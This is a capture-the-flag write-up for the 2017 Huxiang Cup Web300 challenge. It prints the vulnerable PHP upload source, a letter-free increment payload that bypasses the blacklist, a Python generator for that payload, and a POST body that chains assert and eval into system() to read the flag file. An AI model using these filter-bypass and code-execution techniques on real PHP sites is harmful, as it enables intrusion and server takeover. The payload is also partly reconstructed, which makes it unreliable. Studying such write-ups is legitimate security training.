Web300
Opening the page shows its own source:

```php
<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
// Without a ?content= parameter the page just prints its own source.
if(!isset($_GET['content'])){
    show_source(__FILE__);
    die();
}
// Random 32-character name for the file that gets written.
function rand_string( $length ) {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    $size = strlen( $chars );
    $str = '';
    for( $i = 0; $i < $length; $i++) {
        $str .= $chars[ rand( 0, $size - 1 ) ];
    }
    return $str;
}
$data = $_GET['content'];
// Blacklist: every letter, every digit, space and most punctuation.
// Not listed, and therefore usable: $ _ + ' ( ) [ ] { } . = ;
$black_char = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', '|', '~');
// stripos() is case-insensitive, so no letter in either case gets through.
foreach ($black_char as $b) {
    if (stripos($data, $b) !== false){
        die("關鍵字WAF");   // "keyword WAF"
    }
}
$filename=rand_string(0x20).'.php';
$folder='uploads/';
$full_filename = $folder.$filename;
// The filtered input is written verbatim after a PHP open tag, so any
// executable payload that survives the blacklist runs as PHP when fetched.
if(file_put_contents($full_filename, '<?php '.$data)){
    echo "<a href='".$full_filename."'>shell</a></br>";
    echo "我的/flag,你讀到了么";   // "My /flag, can you read it?"
}else{
    echo "噢 噢,錯了";   // "Oops, something went wrong"
}
```
So we have to build a special payload by hand. The path is not completely blocked, because the following characters are not filtered:

= $ _ + ' ( ) [ ] { } and a few more

After that it is only a matter of time. The main points of the construction:

1. Letters can be advanced with ++: incrementing 'A' gives 'B', so any upper-case letter can be reached from 'A'.
2. Arithmetic on a non-numeric string such as '+' evaluates to 0 (PHP 7 emits a "non-numeric value" warning and carries on; PHP 8 throws a TypeError), which gives us the index 0.
3. ''.[] triggers an array-to-string conversion notice and evaluates to the string "Array", which gives us the starting 'A' and lets us spell out POST. Since [ ] { } and . are not filtered, the whole thing can be constructed.

The final payload is below. When submitting it, every + must be URL-encoded as %2b: a raw + in a query string decodes to a space, which is on the blacklist. The original rendering of this writeup swallowed underscores and brackets, so the payload here is reconstructed from what survived (14, 1, 3 and 1 increments, and the closing $_POST['_']($_POST['__']) call); it is sent as a single line.

```php
$_=''.[];            // array-to-string conversion: $_ = "Array" (notice, not fatal)
$__='+';
$__=$__+$__;         // '+' is non-numeric, so the addition evaluates to 0
$_=$_[$__];          // "Array"[0] = 'A'
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;   // 14 steps: 'O'
$___=$_;             // O
$_++;                // 'P'
$__=$_;              // P ($__ is reused; the 0 is no longer needed)
$_++;$_++;$_++;      // 'S'
$____=$_;            // S
$_++;                // 'T'
${'_'.$__.$___.$____.$_}['_'](${'_'.$__.$___.$____.$_}['__']);   // $_POST['_']($_POST['__'])
```
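As an added example (not part of the original writeup), here is a generator for the increment-based payload together with a re-implementation of the challenge's blacklist loop, so a candidate can be checked locally before it is sent. It goes slightly beyond the writeup: the distinct letters of the target word are visited in alphabetical order so that one chain of ++ covers all of them, each letter being saved into its own variable on the way. The variable names ($___, $____, ...), the keys '_' and '__', and the assumption of a PHP 7 runtime (where '+' + '+' evaluates to 0) are my choices, not the challenge author's.

```python
"""Added example, not from the original writeup: generate and locally check an
increment-based PHP payload for the Web300 blacklist.

Assumptions (mine, not the challenge author's): variable names $___, $____, ...
are chosen for clarity; the keys '_' and '__' mirror the POST body used in the
writeup; the PHP runtime is 7.x, where '+' + '+' evaluates to 0 with a warning.
"""
import string
from urllib.parse import quote

# Transcribed from $black_char in the challenge source: all letters, digits,
# space and these punctuation characters.
BLACK_CHARS = set(string.ascii_letters + string.digits + ' !"#%&*,-/:<>?@\\^`|~')


def passes_waf(payload: str) -> bool:
    """Re-implement the PHP loop: stripos() is case-insensitive, so lower-case
    both sides. Returns True if nothing in the blacklist occurs in payload."""
    lowered = payload.lower()
    return not any(b.lower() in lowered for b in BLACK_CHARS)


def build_payload(word: str = "POST", func_key: str = "_", code_key: str = "__") -> str:
    """Emit PHP evaluating  ${'_'.<word>}[func_key](${'_'.<word>}[code_key])
    using only characters the blacklist allows.

    Letters are produced by ++ starting from the 'A' of "Array"; the distinct
    letters of `word` are visited in alphabetical order so a single chain of
    increments covers all of them, each letter saved into its own variable.
    """
    if not (word.isascii() and word.isalpha() and word.isupper()):
        raise ValueError("word must be ASCII upper-case letters")
    if not all(c == "_" for c in func_key + code_key):
        raise ValueError("keys may only use '_' (everything else is blacklisted)")

    parts = [
        "$_=''.[];",        # "Array" (array-to-string conversion notice)
        "$__='+';",
        "$__=$__+$__;",     # non-numeric string arithmetic: 0 (PHP 7)
        "$_=$_[$__];",      # "Array"[0] -> 'A'
    ]
    current = "A"
    var_for = {}
    underscores = 3         # $___, $____, ... one fresh name per distinct letter
    for ch in sorted(set(word)):
        while current != ch:
            parts.append("$_++;")
            current = chr(ord(current) + 1)
        name = "$" + "_" * underscores
        underscores += 1
        parts.append(f"{name}=$_;")
        var_for[ch] = name
    superglobal = "'_'." + ".".join(var_for[c] for c in word)
    parts.append(f"${{{superglobal}}}['{func_key}'](${{{superglobal}}}['{code_key}']);")
    payload = "".join(parts)
    if not passes_waf(payload):
        raise RuntimeError("generated payload would be rejected by the blacklist")
    return payload


def to_query(payload: str) -> str:
    """Percent-encode for the content= parameter. quote(safe='') turns '+' into
    %2B; a raw '+' would decode to a space, which is blacklisted."""
    return "content=" + quote(payload, safe="")


if __name__ == "__main__":
    p = build_payload()
    print(p)
    print(to_query(p))
```

Run it and paste the printed content=... query onto the challenge URL; the body sent to the dropped file is then the same as in the writeup (_ for the function name, __ for the code it receives).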
Then visit the generated uploads/<random>.php with the following POST body and the flag comes back. The '_' entry is the function name (assert) and the '__' entry is the string it evaluates, which in turn evals the pass parameter:

_=assert&__=eval($_POST['pass'])&pass=system('tac ../flag.php');

The response contains the flag file:

<?php $flag="=hxb2017{51f759f39ac1f0cd5509b299b1d908f7}"; ?>
Very good references:
https://www.leavesongs.com/PENETRATION/web...
http://www.freebuf.com/articles/web/9396.h...
Learned something new, lol.
2017湖湘杯 (Huxiang Cup) Writeup